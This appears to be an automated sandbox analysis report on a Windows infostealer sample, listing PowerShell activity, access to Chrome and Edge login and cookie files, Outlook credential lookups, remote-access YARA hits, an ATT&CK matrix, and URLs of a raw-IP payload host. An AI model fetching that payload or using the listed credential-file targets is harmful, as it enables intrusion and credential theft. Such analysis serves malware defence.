Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Forhandlingsfriheden.exe

0_2_0040351C

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: Yara match	File source: 00000009.00000002.3360830946.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3053262929.000000001F460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3360872808.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3053719794.0000000020EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3361007357.00000000042C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match	File source: 00000009.00000002.3360830946.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3053262929.000000001F460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3360872808.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3053719794.0000000020EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3361007357.00000000042C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	115 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	1 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	221 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	612 Process Injection	1 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	1 Clipboard Data	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	612 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Forhandlingsfriheden.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	18%	ReversingLabs

Source	Detection	Scanner	Label
http://www.ftp.ftp://ftp.gopher.	0%	Avira URL Cloud	safe
https://ion=v4.5sPu7	0%	Avira URL Cloud	safe
http://212.162.149.66/KtFSlX90.bin&	0%	Avira URL Cloud	safe
http://212.162.149.66/KtFSlX90.binsd	0%	Avira URL Cloud	safe
http://212.162.149.66/	0%	Avira URL Cloud	safe
http://212.162.149.66/KtFSlX90.bin%	0%	Avira URL Cloud	safe
